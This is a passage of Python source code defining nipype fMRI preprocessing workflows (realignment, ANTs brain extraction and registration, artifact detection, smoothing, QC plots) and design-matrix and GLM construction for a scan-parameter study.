realign = Node(interface=spm.Realign(), name="realign")
realign.inputs.register_to_mean = True
#Coregister - 12 parameters
coregister = Node(interface=spm.Coregister(), name="coregister")
coregister.inputs.jobtype = 'estwrite'
#Plot Realignment
plot_realign = Node(interface=Plot_Realignment_Parameters(), name="plot_realign")
#Artifact Detection
art = Node(interface=ArtifactDetect(), name="art")
art.inputs.use_differences = [True,False]
art.inputs.use_norm = True
art.inputs.norm_threshold = 1
art.inputs.zintensity_threshold = 3
art.inputs.mask_type = 'file'
art.inputs.parameter_source = 'SPM'
# Gunzip - unzip the functional and structural images
gunzip_struc = Node(Gunzip(), name="gunzip_struc")
gunzip_func = Node(Gunzip(), name="gunzip_func")
# Normalize - normalizes functional and structural images to the MNI template
normalize = Node(interface=Normalize12(jobtype='estwrite',tpm=template_file),
name="normalize")
#Plot normalization Check
plot_normalization_check = Node(interface=Plot_Coregistration_Montage(), name="plot_normalization_check")
plot_normalization_check.inputs.canonical_img = canonical_file
#Plot QA
plot_qa = Node(Plot_Quality_Control(),name="plot_qa")
#Create Mask
compute_mask = Node(interface=ComputeMask(), name="compute_mask")
#remove lower 5% of histogram of mean image
compute_mask.inputs.m = .05
#Smooth
#implicit masking (.im) = 0, dtype = 0
smooth = Node(interface=spm.Smooth(), name = "smooth")
smooth.inputs.fwhm=6
#Create Covariate matrix
make_cov = Node(interface=Create_Covariates(), name="make_cov")
#Plot Quality Control Check
quality_control = Node(interface=Plot_Quality_Control(), name='quality_control')
# Create a datasink to clean up output files
datasink = Node(interface=nio.DataSink(), name='datasink')
datasink.inputs.base_directory = output_dir
datasink.inputs.container = subject_id
########################################
# Create Workflow
########################################
workflow = Workflow(name = 'Preprocessed')
workflow.base_dir = os.path.join(base_dir,subject_id)
workflow.connect([(datasource, gunzip_struc,[('struct','in_file')]),
(func_source, trim,[('scan','in_file')]),
(trim, gunzip_func,[('out_file','in_file')]),
(gunzip_func, realign, [('out_file', 'in_files')]),
(realign, quality_control, [('realigned_files', 'dat_img')]),
(gunzip_struc,coregister, [('out_file', 'source')]),
(coregister, normalize,[('coregistered_source','image_to_align')]),
(realign,coregister, [('mean_image', 'target'),
('realigned_files', 'apply_to_files')]),
(realign,normalize, [(('mean_image', get_vox_dims), 'write_voxel_sizes')]),
(coregister,normalize, [('coregistered_files', 'apply_to_files')]),
(normalize, smooth, [('normalized_files', 'in_files')]),
(realign, compute_mask, [('mean_image','mean_volume')]),
(compute_mask,art,[('brain_mask','mask_file')]),
(realign,art,[('realignment_parameters','realignment_parameters'),
('realigned_files','realigned_files')]),
(realign,plot_realign, [('realignment_parameters', 'realignment_parameters')]),
(normalize, plot_normalization_check, [('normalized_files', 'wra_img')]),
(realign, make_cov, [('realignment_parameters', 'realignment_parameters')]),
(art, make_cov, [('outlier_files', 'spike_id')]),
(normalize, datasink, [('normalized_files', 'structural.@normalize')]),
(coregister, datasink, [('coregistered_source', 'structural.@struct')]),
(smooth, datasink, [('smoothed_files', 'functional.@smooth')]),
(plot_realign, datasink, [('plot', 'functional.@plot_realign')]),
(plot_normalization_check, datasink, [('plot', 'functional.@plot_normalization')]),
(make_cov, datasink, [('covariates', 'functional.@covariates')]),
(quality_control, datasink, [('plot', 'functional.@quality_control')])
])
return workflow
def TV_Preproc_Pipeline(base_dir=None, output_dir=None, resources_dir=None, subject_id=None, volsToTrim = 5, smoothingKernel = 4):
"""
Create a nipype preprocessing workflow to analyze data from the TV study.
THIS IS DESIGNED TO BE RUN IN A DOCKER CONTAINER WITH FSL AND ANTS
Pre-processing steps include:
Trimming extra scans (nipy)
Realignment/Motion Correction (fsl)
Artifact Detection (nipype)
Brain Extraction + Bias Correction (ANTs)
Coregistration (rigid) (ANTs)
Normalization to MNI 152 2mm (non-linear) (ANTs)
Quality Control figure generation:
- Realignment parameters
- Quality check of mean signal, sd and frame differences
- Normalization check
Args:
base_dir: path to raw data folder with subjects listed as sub-folders
output_dir: path where final outputted files and figures should go
resources_dir: path where template files for MNI and ANTs live
subject_id: subject to run (should match folder name)
Return:
workflow: A complete nipype workflow
"""
import os
from glob import glob
import matplotlib
matplotlib.use('Agg')
from nipype.interfaces.io import DataSink, DataGrabber
from nipype.interfaces.utility import Merge, IdentityInterface
from nipype.pipeline.engine import Node, Workflow
from cosanlab_preproc.interfaces import Plot_Coregistration_Montage, Plot_Quality_Control, Plot_Realignment_Parameters, Create_Covariates
from cosanlab_preproc.utils import get_resource_path
from nipype.interfaces.nipy.preprocess import Trim, ComputeMask
from nipype.algorithms.rapidart import ArtifactDetect
from nipype.interfaces.ants.segmentation import BrainExtraction
from nipype.interfaces.ants import Registration, ApplyTransforms
from nipype.interfaces.fsl import MCFLIRT
from nipype.interfaces.fsl.maths import MeanImage
from nipype.interfaces.fsl.utils import Smooth
###################################
### GLOBALS, PATHS ###
###################################
MNItemplate = os.path.join(get_resource_path,'MNI152_T1_2mm_brain.nii.gz')
MNItemplatehasskull = os.path.join(get_resource_path,'MNI152_T1_2mm.nii.gz')
bet_ants_template = os.path.join(get_resource_path,'OASIS_template.nii.gz')
bet_ants_prob_mask = os.path.join(get_resource_path,'OASIS_BrainCerebellumProbabilityMask.nii.gz')
bet_ants_registration_mask = os.path.join(get_resource_path,'OASIS_BrainCerebellumRegistrationMask.nii.gz')
bet_ants_extraction_mask = os.path.join(get_resource_path,'OASIS_BrainCerebellumExtractionMask.nii.gz')
###################################
### DATA INPUT ###
###################################
#Create a datagrabber that takes a subid as input and creates func and struct dirs
datasource = Node(DataGrabber(
infields=['subject_id'],
outfields = ['func','struct']),
name = 'datasource')
datasource.inputs.base_directory = base_dir
datasource.inputs.subject_id = subject_id
datasource.inputs.template = '*'
datasource.inputs.sort_filelist = True
datasource.inputs.field_template = {'struct': '%s/T1.nii',
'func': '%s/*ep*.nii'}
datasource.inputs.template_args = {'struct' :[['subject_id']],
'func': [['subject_id']]}
#Then grab all epis using an Identity Interface which is an iterable node
func_scans = Node(IdentityInterface(fields=['scan']),name='func_scans')
func_scans.inputs.subject_id = subject_id
func_scans.iterables = ('scan', glob(os.path.join(base_dir,subject_id,'*ep*.nii')))
###################################
### TRIM ###
###################################
trim = Node(Trim(), name = 'trim')
trim.inputs.begin_index = volsToTrim
###################################
### REALIGN ###
###################################
realign_fsl = Node(MCFLIRT(),name="realign")
realign_fsl.inputs.cost = 'mutualinfo'
realign_fsl.inputs.mean_vol = True
realign_fsl.inputs.output_type = 'NIFTI_GZ'
realign_fsl.inputs.save_mats = True
realign_fsl.inputs.save_rms = True
realign_fsl.inputs.save_plots = True
###################################
### MEAN EPIs ###
###################################
#For coregistration after realignment
mean_epi = Node(MeanImage(),name='mean_epi')
mean_epi.inputs.dimension = 'T'
#For after normalization is done to plot checks
mean_norm_epi = Node(MeanImage(),name='mean_norm_epi')
mean_norm_epi.inputs.dimension = 'T'
###################################
### MASK, ART, COV CREATION ###
###################################
compute_mask = Node(ComputeMask(), name='compute_mask')
compute_mask.inputs.m = .05
art = Node(ArtifactDetect(),name='art')
art.inputs.use_differences = [True, False]
art.inputs.use_norm = True
art.inputs.norm_threshold = 1
art.inputs.zintensity_threshold = 3
art.inputs.mask_type = 'file'
art.inputs.parameter_source = 'FSL'
make_cov = Node(Create_Covariates(),name='make_cov')
###################################
### BRAIN EXTRACTION ###
###################################
brain_extraction_ants = Node(BrainExtraction(),name='brain_extraction')
brain_extraction_ants.inputs.dimension = 3
brain_extraction_ants.inputs.use_floatingpoint_precision = 1
brain_extraction_ants.inputs.num_threads = 12
brain_extraction_ants.inputs.brain_probability_mask = bet_ants_prob_mask
brain_extraction_ants.inputs.brain_template = bet_ants_template
brain_extraction_ants.inputs.extraction_registration_mask = bet_ants_registration_mask
###################################
### COREGISTRATION ###
###################################
coregistration = Node(Registration(), name='coregistration')
coregistration.inputs.float = False
coregistration.inputs.output_transform_prefix = "meanEpi2highres"
coregistration.inputs.transforms = ['Rigid']
coregistration.inputs.transform_parameters = [(0.1,), (0.1,)]
coregistration.inputs.number_of_iterations = [[1000,500,250,100]]
coregistration.inputs.dimension = 3
coregistration.inputs.num_threads = 12
coregistration.inputs.write_composite_transform = True
coregistration.inputs.collapse_output_transforms = True
coregistration.inputs.metric = ['MI']
coregistration.inputs.metric_weight = [1]
coregistration.inputs.radius_or_number_of_bins = [32]
coregistration.inputs.sampling_strategy = ['Regular']
coregistration.inputs.sampling_percentage = [0.25]
coregistration.inputs.convergence_threshold = [1.e-8]
coregistration.inputs.convergence_window_size = [10]
coregistration.inputs.smoothing_sigmas = [[3,2,1,0]]
coregistration.inputs.sigma_units = ['mm']
coregistration.inputs.shrink_factors = [[8,4,2,1]]
coregistration.inputs.use_estimate_learning_rate_once = [True]
coregistration.inputs.use_histogram_matching = [False]
coregistration.inputs.initial_moving_transform_com = True
coregistration.inputs.output_warped_image = True
coregistration.inputs.winsorize_lower_quantile = 0.01
coregistration.inputs.winsorize_upper_quantile = 0.99
###################################
### NORMALIZATION ###
###################################
#ANTS step through several different iterations starting with linear, affine and finally non-linear diffuseomorphic alignment. The settings below increase the run time but yield a better alignment solution
normalization = Node(Registration(),name='normalization')
normalization.inputs.float = False
normalization.inputs.collapse_output_transforms=True
normalization.inputs.convergence_threshold=[1e-06]
normalization.inputs.convergence_window_size=[10]
normalization.inputs.dimension = 3
normalization.inputs.fixed_image = MNItemplate #MNI 152 1mm
normalization.inputs.initial_moving_transform_com=True
normalization.inputs.metric=['MI', 'MI', 'CC']
normalization.inputs.metric_weight=[1.0]*3
normalization.inputs.number_of_iterations=[[1000, 500, 250, 100],
[1000, 500, 250, 100],
[100, 70, 50, 20]]
normalization.inputs.num_threads=12
normalization.inputs.output_transform_prefix = 'anat2template'
normalization.inputs.output_inverse_warped_image=True
normalization.inputs.output_warped_image = True
normalization.inputs.radius_or_number_of_bins=[32, 32, 4]
normalization.inputs.sampling_percentage=[0.25, 0.25, 1]
normalization.inputs.sampling_strategy=['Regular',
'Regular',
'None']
normalization.inputs.shrink_factors=[[8, 4, 2, 1]]*3
normalization.inputs.sigma_units=['vox']*3
normalization.inputs.smoothing_sigmas=[[3, 2, 1, 0]]*3
normalization.inputs.terminal_output='stream'
normalization.inputs.transforms = ['Rigid','Affine','SyN']
normalization.inputs.transform_parameters=[(0.1,),
(0.1,),
(0.1, 3.0, 0.0)]
normalization.inputs.use_histogram_matching=True
normalization.inputs.winsorize_lower_quantile=0.005
normalization.inputs.winsorize_upper_quantile=0.995
normalization.inputs.write_composite_transform=True
###################################
### APPLY TRANSFORMS AND SMOOTH ###
###################################
#The nodes above compute the required transformation matrices but don't actually apply them to the data. Here we're merging both matrices and applying them in a single transformation step to reduce the amount of data interpolation.
merge_transforms = Node(Merge(2), iterfield=['in2'], name ='merge_transforms')
apply_transforms = Node(ApplyTransforms(),iterfield=['input_image'],name='apply_transforms')
apply_transforms.inputs.input_image_type = 3
apply_transforms.inputs.float = False
apply_transforms.inputs.num_threads = 12
apply_transforms.inputs.environ = {}
apply_transforms.inputs.interpolation = 'BSpline'
apply_transforms.inputs.invert_transform_flags = [False, False]
apply_transforms.inputs.terminal_output = 'stream'
apply_transforms.inputs.reference_image = MNItemplate
#Use FSL for smoothing
smooth = Node(Smooth(),name='smooth')
smooth.inputs.sigma = smoothingKernel
###################################
### PLOTS ###
###################################
plot_realign = Node(Plot_Realignment_Parameters(),name="plot_realign")
plot_qa = Node(Plot_Quality_Control(),name="plot_qa")
plot_normalization_check = Node(Plot_Coregistration_Montage(),name="plot_normalization_check")
plot_normalization_check.inputs.canonical_img = MNItemplatehasskull
###################################
### DATA OUTPUT ###
###################################
#Collect all final outputs in the output dir and get rid of file name additions
datasink = Node(DataSink(),name='datasink')
datasink.inputs.base_directory = output_dir
datasink.inputs.container = subject_id
datasink.inputs.substitutions = [('_scan_..data..fmriData..' + subject_id + '..','')]
###################################
### HOOK IT ALL CAPTAIN! ###
###################################
workflow = Workflow(name='Preprocessing')
workflow.base_dir = os.path.join(base_dir,subject_id)
workflow.connect([
(func_scans, trim, [('scan','in_file')]),
(trim, realign_fsl, [('out_file','in_file')]),
(realign_fsl, plot_realign, [('par_file','realignment_parameters')]),
(realign_fsl, plot_qa, [('out_file','dat_img')]),
(realign_fsl, art, [('out_file','realigned_files'),
('par_file','realignment_parameters')]),
(realign_fsl, mean_epi, [('out_file','in_file')]),
(realign_fsl, make_cov, [('par_file','realignment_parameters')]),
(mean_epi, compute_mask, [('out_file','mean_volume')]),
(compute_mask, art, [('brain_mask','mask_file')]),
(art, make_cov, [('outlier_files','spike_id')]),
(datasource, brain_extraction_ants, [('struct','anatomical_image')]),
(brain_extraction_ants, coregistration, [('BrainExtractionBrain','fixed_image')]),
(mean_epi, coregistration, [('out_file','moving_image')]),
(brain_extraction_ants, normalization, [('BrainExtractionBrain','moving_image')]),
(coregistration, merge_transforms, [('composite_transform','in2')]),
(normalization, merge_transforms, [('composite_transform','in1')]),
(merge_transforms, apply_transforms, [('out','transforms')]),
(realign_fsl, apply_transforms, [('out_file','input_image')]),
(apply_transforms, mean_norm_epi, [('output_image','in_file')]),
(mean_norm_epi, plot_normalization_check, [('out_file','wra_img')]),
(apply_transforms, datasink, [('output_image', 'functional.@normalize')]),
(apply_transforms, smooth, [('output_image','in_file')]),
(smooth, datasink, [('smoothed_file','functional.@smooth')]),
(plot_realign, datasink, [('plot','functional.@plot_realign')]),
(plot_qa, datasink, [('plot','functional.@plot_qa')]),
(plot_normalization_check, datasink, [('plot','functional.@plot_normalization')]),
(make_cov, datasink, [('covariates','functional.@covariates')]),
(brain_extraction_ants, datasink, [('BrainExtractionBrain','structural.@struct')]),
(normalization, datasink, [('warped_image','structural.@normalize')])
])
if not os.path.exists(os.path.join(output_dir,'Preprocsteps.png')):
workflow.write_graph(dotfilename=os.path.join(output_dir,'Preprocsteps'),format='png')
return workflow
def ScanParams_Preproc_Pipeline(base_dir=None, output_dir=None, subject_id=None, smoothingKernel=4):
"""
Create a nipype preprocessing workflow to analyze data from the scanParams testing acquisitions.
THIS IS DESIGNED TO BE RUN IN A DOCKER CONTAINER WITH FSL AND ANTS
Pre-processing steps include:
Realignment/Motion Correction (fsl)
Artifact Detection (nipype)
Brain Extraction + Bias Correction (ANTs)
Coregistration (rigid) (ANTs)
Normalization to MNI 152 2mm (non-linear) (ANTs)
Quality Control figure generation:
- Realignment parameters
- Quality check of mean signal, sd and frame differences
- Normalization check
Makes 3 design matrices: standard block design (Right, Left), "mvpa" design (R1, R2, R3, L1, L2,L3), contrast block (R-L)
Fits 3 first level models (REQUIRES NLTOOLS!)
Args:
base_dir: path to raw data folder with subjects listed as sub-folders
output_dir: path where final outputted files and figures should go
resources_dir: path where template files for MNI and ANTs live
subject_id: subject to run (should match folder name)
Return:
workflow: A complete nipype workflow
"""
import os
from glob import glob
import matplotlib
matplotlib.use('Agg')
from nipype.interfaces.io import DataSink, DataGrabber
from nipype.interfaces.utility import Merge, IdentityInterface, Function
from nipype.pipeline.engine import Node, Workflow
from cosanlab_preproc.interfaces import Plot_Coregistration_Montage, Plot_Quality_Control, Plot_Realignment_Parameters, Create_Covariates, Build_Xmat, GLM
from cosanlab_preproc.utils import get_resource_path
from nipype.interfaces.nipy.preprocess import ComputeMask
from nipype.algorithms.rapidart import ArtifactDetect
from nipype.interfaces.ants.segmentation import BrainExtraction
from nipype.interfaces.ants import Registration, ApplyTransforms
from nipype.interfaces.fsl import MCFLIRT
from nipype.interfaces.fsl.maths import MeanImage
from nipype.interfaces.fsl.utils import Smooth
###################################
### GLOBALS, PATHS ###
###################################
MNItemplate = os.path.join(get_resource_path(),'MNI152_T1_2mm_brain.nii.gz')
MNItemplatehasskull = os.path.join(get_resource_path(),'MNI152_T1_2mm.nii.gz')
bet_ants_template = os.path.join(get_resource_path(),'OASIS_template.nii.gz')
bet_ants_prob_mask = os.path.join(get_resource_path(),'OASIS_BrainCerebellumProbabilityMask.nii.gz')
bet_ants_registration_mask = os.path.join(get_resource_path(),'OASIS_BrainCerebellumRegistrationMask.nii.gz')
#bet_ants_extraction_mask = os.path.join(get_resource_path(),'OASIS_BrainCerebellumExtractionMask.nii.gz')
###################################
### DATA INPUT ###
###################################
#Create a datagrabber that takes a subid as input and creates func and struct dirs
datasource = Node(DataGrabber(
infields=['subject_id'],
outfields = ['func','struct']),
name = 'datasource')
datasource.inputs.base_directory = base_dir
datasource.inputs.subject_id = subject_id
datasource.inputs.template = '*'
datasource.inputs.sort_filelist = True
datasource.inputs.field_template = {'struct': '%s/T1.nii.gz',
'func': '%s/*mm.nii.gz'}
datasource.inputs.template_args = {'struct' :[['subject_id']],
'func': [['subject_id']]}
#Then grab all epis using an Identity Interface which is an iterable node
func_scans = Node(IdentityInterface(fields=['scan']),name='func_scans')
func_scans.inputs.subject_id = subject_id
func_scans.iterables = ('scan', glob(os.path.join(base_dir,subject_id,'*mm.nii.gz')))
###################################
### TR GRABBER ###
###################################
def getTR(fName):
'''
Gets TR length of scan by reading in the nifti header.
'''
import nibabel as nib
f = nib.load(fName)
return round(f.header.get_zooms()[-1]*1000)/1000
get_tr = Node(interface=Function(input_names=['fName'],
output_names=['TR'],
function=getTR),
name='get_tr')
###################################
### ONSETS GRABBER ###
###################################
def getOnsets(fName):
'''
Gets onsets txt file given path to a .nii.gz file.
Assumes both files are named the same.
'''
import os
fPieces = os.path.split(fName)
scanId = fPieces[-1].split('.nii.gz')[0]
return os.path.join(fPieces[0],scanId+'.txt')
get_onsets = Node(interface=Function(input_names=['fName'],
output_names=['onsetsFile'],
function=getOnsets),
name='get_onsets')
###################################
### REALIGN ###
###################################
realign_fsl = Node(MCFLIRT(),name="realign")
realign_fsl.inputs.cost = 'mutualinfo'
realign_fsl.inputs.mean_vol = True
realign_fsl.inputs.output_type = 'NIFTI_GZ'
realign_fsl.inputs.save_mats = True
realign_fsl.inputs.save_rms = True
realign_fsl.inputs.save_plots = True
###################################
### MEAN EPIs ###
###################################
#For coregistration after realignment
mean_epi = Node(MeanImage(),name='mean_epi')
mean_epi.inputs.dimension = 'T'
#For after normalization is done to plot checks
mean_norm_epi = Node(MeanImage(),name='mean_norm_epi')
mean_norm_epi.inputs.dimension = 'T'
###################################
### MASK, ART, COV CREATION ###
###################################
compute_mask = Node(ComputeMask(), name='compute_mask')
compute_mask.inputs.m = .05
art = Node(ArtifactDetect(),name='art')
art.inputs.use_differences = [True, False]
art.inputs.use_norm = True
art.inputs.norm_threshold = 1
art.inputs.zintensity_threshold = 3
art.inputs.mask_type = 'file'
art.inputs.parameter_source = 'FSL'
make_cov = Node(Create_Covariates(),name='make_cov')
###################################
### BRAIN EXTRACTION ###
###################################
brain_extraction_ants = Node(BrainExtraction(),name='brain_extraction')
brain_extraction_ants.inputs.dimension = 3
brain_extraction_ants.inputs.use_floatingpoint_precision = 1
brain_extraction_ants.inputs.num_threads = 12
brain_extraction_ants.inputs.brain_probability_mask = bet_ants_prob_mask
brain_extraction_ants.inputs.keep_temporary_files = 1
brain_extraction_ants.inputs.brain_template = bet_ants_template
brain_extraction_ants.inputs.extraction_registration_mask = bet_ants_registration_mask
###################################
### COREGISTRATION ###
###################################
coregistration = Node(Registration(), name='coregistration')
coregistration.inputs.float = False
coregistration.inputs.output_transform_prefix = "meanEpi2highres"
coregistration.inputs.transforms = ['Rigid']
coregistration.inputs.transform_parameters = [(0.1,), (0.1,)]
coregistration.inputs.number_of_iterations = [[1000,500,250,100]]
coregistration.inputs.dimension = 3
coregistration.inputs.num_threads = 12
coregistration.inputs.write_composite_transform = True
coregistration.inputs.collapse_output_transforms = True
coregistration.inputs.metric = ['MI']
coregistration.inputs.metric_weight = [1]
coregistration.inputs.radius_or_number_of_bins = [32]
coregistration.inputs.sampling_strategy = ['Regular']
coregistration.inputs.sampling_percentage = [0.25]
coregistration.inputs.convergence_threshold = [1.e-8]
coregistration.inputs.convergence_window_size = [10]
coregistration.inputs.smoothing_sigmas = [[3,2,1,0]]
coregistration.inputs.sigma_units = ['mm']
coregistration.inputs.shrink_factors = [[8,4,2,1]]
coregistration.inputs.use_estimate_learning_rate_once = [True]
coregistration.inputs.use_histogram_matching = [False]
coregistration.inputs.initial_moving_transform_com = True
coregistration.inputs.output_warped_image = True
coregistration.inputs.winsorize_lower_quantile = 0.01
coregistration.inputs.winsorize_upper_quantile = 0.99
###################################
### NORMALIZATION ###
###################################
#ANTS step through several different iterations starting with linear, affine and finally non-linear diffuseomorphic alignment. The settings below increase the run time but yield a better alignment solution
normalization = Node(Registration(),name='normalization')
normalization.inputs.float = False
normalization.inputs.collapse_output_transforms=True
normalization.inputs.convergence_threshold=[1e-06]
normalization.inputs.convergence_window_size=[10]
normalization.inputs.dimension = 3
normalization.inputs.fixed_image = MNItemplate #MNI 152 1mm
normalization.inputs.initial_moving_transform_com=True
normalization.inputs.metric=['MI', 'MI', 'CC']
normalization.inputs.metric_weight=[1.0]*3
normalization.inputs.number_of_iterations=[[1000, 500, 250, 100],
[1000, 500, 250, 100],
[100, 70, 50, 20]]
normalization.inputs.num_threads=12
normalization.inputs.output_transform_prefix = 'anat2template'
normalization.inputs.output_inverse_warped_image=True
normalization.inputs.output_warped_image = True
normalization.inputs.radius_or_number_of_bins=[32, 32, 4]
normalization.inputs.sampling_percentage=[0.25, 0.25, 1]
normalization.inputs.sampling_strategy=['Regular',
'Regular',
'None']
normalization.inputs.shrink_factors=[[8, 4, 2, 1]]*3
normalization.inputs.sigma_units=['vox']*3
normalization.inputs.smoothing_sigmas=[[3, 2, 1, 0]]*3
normalization.inputs.terminal_output='stream'
normalization.inputs.transforms = ['Rigid','Affine','SyN']
normalization.inputs.transform_parameters=[(0.1,),
(0.1,),
(0.1, 3.0, 0.0)]
normalization.inputs.use_histogram_matching=True
normalization.inputs.winsorize_lower_quantile=0.005
normalization.inputs.winsorize_upper_quantile=0.995
normalization.inputs.write_composite_transform=True
###################################
### APPLY TRANSFORMS AND SMOOTH ###
###################################
#The nodes above compute the required transformation matrices but don't actually apply them to the data. Here we're merging both matrices and applying them in a single transformation step to reduce the amount of data interpolation.
merge_transforms = Node(Merge(2), iterfield=['in2'], name ='merge_transforms')
apply_transforms = Node(ApplyTransforms(),iterfield=['input_image'],name='apply_transforms')
apply_transforms.inputs.input_image_type = 3
apply_transforms.inputs.float = False
apply_transforms.inputs.num_threads = 12
apply_transforms.inputs.environ = {}
apply_transforms.inputs.interpolation = 'BSpline'
apply_transforms.inputs.invert_transform_flags = [False, False]
apply_transforms.inputs.terminal_output = 'stream'
apply_transforms.inputs.reference_image = MNItemplate
#Use FSL for smoothing
smooth = Node(Smooth(),name='smooth')
smooth.inputs.sigma = smoothingKernel
###################################
### PLOTS ###
###################################
plot_realign = Node(Plot_Realignment_Parameters(),name="plot_realign")
plot_qa = Node(Plot_Quality_Control(),name="plot_qa")
plot_normalization_check = Node(Plot_Coregistration_Montage(),name="plot_normalization_check")
plot_normalization_check.inputs.canonical_img = MNItemplatehasskull
###################################
### Xmat ###
###################################
build_xmat = Node(Build_Xmat(),name="build_xmat")
build_xmat.inputs.header = False
build_xmat.inputs.delim = '\t'
build_xmat.inputs.fillNa = True
build_xmat.inputs.dur = 8
###################################
### CONTRAST Xmat ###
###################################
def buildContrastXmat(covFile,onsetsFile,TR):
import matplotlib
matplotlib.use('Agg')
from nipy.modalities.fmri.hemodynamic_models import glover_hrf
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
import numpy as np
dur = np.ceil(8./TR)
header = None
delim = '\t'
hrf = glover_hrf(tr = TR,oversampling=1)
#Just a single file
C = pd.read_csv(covFile)
C['intercept'] = 1
O = pd.read_csv(onsetsFile,header=header,delimiter=delim)
if header is None:
if isinstance(O.iloc[0,0],str):
O.columns = ['Stim','Onset']
else:
O.columns = ['Onset','Stim']
O['Onset'] = O['Onset'].apply(lambda x: int(np.floor(x/TR)))
#Build dummy codes
#Subtract one from onsets row, because pd DFs are 0-indexed but TRs are 1-indexed
X = pd.DataFrame(columns=['contrast'],data=np.zeros([C.shape[0],1]))
for i, row in O.iterrows():
#do dur-1 for slicing because .ix includes the last element of the slice
if row['Stim'] == 'right':
X.ix[row['Onset']-1:(row['Onset']-1)+dur-1,'contrast'] = 1
else:
X.ix[row['Onset']-1:(row['Onset']-1)+dur-1,'contrast'] = -1
X['contrast']= np.convolve(hrf,X.contrast.values)[:X.shape[0]]
X = pd.concat([X,C],axis=1)
X = X.fillna(0)
matplotlib.rcParams['axes.edgecolor'] = 'black'
matplotlib.rcParams['axes.linewidth'] = 2
fig, ax = plt.subplots(1,figsize=(12,10))
ax = sns.heatmap(X,cmap='gray', cbar=False,ax=ax);
for _, spine in ax.spines.items():
spine.set_visible(True)
for i, label in enumerate(ax.get_yticklabels()):
if i > 0 and i < X.shape[0]:
label.set_visible(False)
plotFile = 'Xmat_con.png'
fig.savefig(plotFile)
plt.close(fig)
del fig
xmatFile = 'Xmat_con.csv'
X.to_csv(xmatFile,index=False)
return plotFile, xmatFile
build_xmat_con = Node(interface=Function(input_names=['covFile','onsetsFile','TR'],
output_names=['plot','xmat'],
function=buildContrastXmat),
name='build_xmat_con')
###################################
### MVPA Xmat ###
###################################
def buildMVPAXmat(covFile,onsetsFile,TR):
import matplotlib
matplotlib.use('Agg')
from nipy.modalities.fmri.hemodynamic_models import glover_hrf
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
import numpy as np
dur = np.ceil(8./TR)
header = None
delim = '\t'
hrf = glover_hrf(tr = TR,oversampling=1)
#Just a single file
C = pd.read_csv(covFile)
C['intercept'] = 1
O = pd.read_csv(onsetsFile,header=header,delimiter=delim)
if header is None:
if isinstance(O.iloc[0,0],str):
O.columns = ['Stim','Onset']
else:
O.columns = ['Onset','Stim']
O['Onset'] = O['Onset'].apply(lambda x: int(np.floor(x/TR)))
#Uniquify stims
leftCount = 1
rightCount = 1
newStims = []
for i, row in O.iterrows():
if row['Stim'] == 'right':
newStims.append('right_'+str(rightCount))
rightCount +=1
elif row['Stim'] == 'left':
newStims.append('left_'+str(leftCount))
leftCount +=1
O['Stim'] = newStims
#Build dummy codes
#Subtract one from onsets row, because pd DFs are 0-indexed but TRs are 1-indexed
X = pd.DataFrame(columns=O.Stim.unique(),data=np.zeros([C.shape[0],len(O.Stim.unique())]))
for i, row in O.iterrows():
#do dur-1 for slicing because .ix includes the last element of the slice
X.ix[row['Onset']-1:(row['Onset']-1)+dur-1,row['Stim']] = 1
X = X.reindex_axis(sorted(X.columns), axis=1)
for i in range(X.shape[1]):
X.iloc[:,i] = np.convolve(hrf,X.iloc[:,i])[:X.shape[0]]
X = pd.concat([X,C],axis=1)
X = X.fillna(0)
matplotlib.rcParams['axes.edgecolor'] = 'black'
matplotlib.rcParams['axes.linewidth'] = 2
fig, ax = plt.subplots(1,figsize=(12,10))
ax = sns.heatmap(X,cmap='gray', cbar=False,ax=ax);
for _, spine in ax.spines.items():
spine.set_visible(True)
for i, label in enumerate(ax.get_yticklabels()):
if i > 0 and i < X.shape[0]:
label.set_visible(False)
plotFile = 'Xmat_mvpa.png'
fig.savefig(plotFile)
plt.close(fig)
del fig
xmatFile = 'Xmat_mvpa.csv'
X.to_csv(xmatFile,index=False)
return plotFile, xmatFile
build_xmat_mvpa = Node(interface=Function(input_names=['covFile','onsetsFile','TR'],
output_names=['plot','xmat'],
function=buildMVPAXmat),
name='build_xmat_mvpa')
###################################
### GLM CONTRAST###
###################################
glm = Node(GLM(),name="glm")
glm.inputs.detrend = True
###################################
### GLM CONTRAST###
###################################
glm_con = Node(GLM(),name="glm_con")
glm_con.inputs.detrend = True
glm_con.inputs.prependName = 'con'
###################################
### GLM MVPA###
###################################
glm_mvpa = Node(GLM(),name="glm_mvpa")
glm_mvpa.inputs.detrend = True
glm_mvpa.inputs.prependName = 'mvpa'
###################################
### DATA OUTPUT ###
###################################
#Collect all final outputs in the output dir and get rid of file name additions
datasink = Node(DataSink(),name='datasink')
datasink.inputs.base_directory = output_dir
datasink.inputs.container = subject_id
datasink.inputs.substitutions = [('_scan_..data..fmriData..' + subject_id + '..','')]
###################################
### FILE GETTER (used to run alt glms after preproc) ###
###################################
# def fileGetter(subject_id,output_dir):
# '''
# Gets onsets txt file given path to a .nii.gz file.
# Assumes both files are named the same.
# '''
# import os
# #Get final epi
# fPieces = os.path.split(fName)
# scanId = fPieces[-1].split('.nii.gz')[0]
# return os.path.join(fPieces[0],scanId+'.txt')
# get_onsets = Node(interface=Function(input_names=['fName'],
# output_names=['onsetsFile'],
# function=getOnsets),
# name='get_onsets')
###################################
### HOOK IT ALL CAPTAIN! ###
###################################
workflow = Workflow(name='Preprocessing')
workflow.base_dir = os.path.join(base_dir,subject_id)
workflow.connect([
(func_scans, realign_fsl, [('scan','in_file')]),
(func_scans, get_tr, [('scan','fName')]),
(func_scans, get_onsets, [('scan','fName')]),
(realign_fsl, plot_realign, [('par_file','realignment_parameters')]),
(realign_fsl, plot_qa, [('out_file','dat_img')]),
(realign_fsl, art, [('out_file','realigned_files'),
('par_file','realignment_parameters')]),
(realign_fsl, mean_epi, [('out_file','in_file')]),
(realign_fsl, make_cov, [('par_file','realignment_parameters')]),
(mean_epi, compute_mask, [('out_file','mean_volume')]),
(compute_mask, art, [('brain_mask','mask_file')]),
(art, make_cov, [('outlier_files','spike_id')]),
(datasource, brain_extraction_ants, [('struct','anatomical_image')]),
(brain_extraction_ants, coregistration, [('BrainExtractionBrain','fixed_image')]),
(mean_epi, coregistration, [('out_file','moving_image')]),
(brain_extraction_ants, normalization, [('BrainExtractionBrain','moving_image')]),
(coregistration, merge_transforms, [('composite_transform','in2')]),
(normalization, merge_transforms, [('composite_transform','in1')]),
(merge_transforms, apply_transforms, [('out','transforms')]),
(realign_fsl, apply_transforms, [('out_file','input_image')]),
